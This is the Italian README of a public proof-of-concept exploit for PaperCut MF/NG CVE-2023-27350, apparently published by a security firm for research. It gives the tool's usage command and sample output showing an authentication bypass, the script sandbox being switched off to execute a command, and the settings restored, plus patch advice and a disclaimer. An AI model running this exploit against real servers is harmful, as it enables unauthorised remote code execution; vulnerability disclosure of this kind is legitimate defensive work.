
Exploit proof-of-concept per PaperCut CVE-2023-27350, che combina il bypass dell'autenticazione con l'abuso dello scripting integrato per ottenere l'esecuzione remota di codice su istanze MF/NG vulnerabili.
POC per CVE-2023-27350 che interessa PaperCut MF/NG
Un'analisi tecnica delle cause profonde della vulnerabilità, gli indicatori di compromissione e l'esposizione a internet sono disponibili sul nostro blog: https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise
Questo POC utilizza una vulnerabilità di bypass dell'autenticazione concatenata con l'abuso della funzionalità di scripting integrata per eseguire codice.
python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exe
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y
Aggiorna all'ultima versione o mitiga seguendo le istruzioni fornite nell'avviso di sicurezza di PaperCut
Questo software è stato creato esclusivamente per scopi di ricerca accademica e per lo sviluppo di tecniche difensive efficaci, e non è destinato a essere utilizzato per attaccare sistemi se non esplicitamente autorizzati. I manutentori del progetto non sono responsabili dell'uso improprio del software. Usalo in modo responsabile.